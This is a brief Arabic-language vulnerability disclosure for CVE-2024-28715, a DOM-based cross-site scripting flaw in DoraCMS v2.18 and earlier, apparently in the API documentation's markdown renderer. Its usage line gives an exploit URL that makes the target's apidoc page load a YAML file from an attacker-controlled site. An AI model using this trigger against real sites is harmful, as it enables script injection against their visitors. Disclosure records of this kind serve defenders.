
[معرف CVE]
CVE-2024-28715
[المنتج]
DoraCMS
[الإصدار]
DoraCMS v2.18 والإصدارات السابقة
[نوع المشكلة]
XSS قائم على DOM.
[الوصف]
ثغرة Cross Site Scripting في DOraCMS الإصدار v.2.18 والإصدارات السابقة تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر وظيفة markdown0 في نقطة النهاية /app/public/apidoc/oas3/wrap-components/markdown.jsx.
[الاستخدام]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml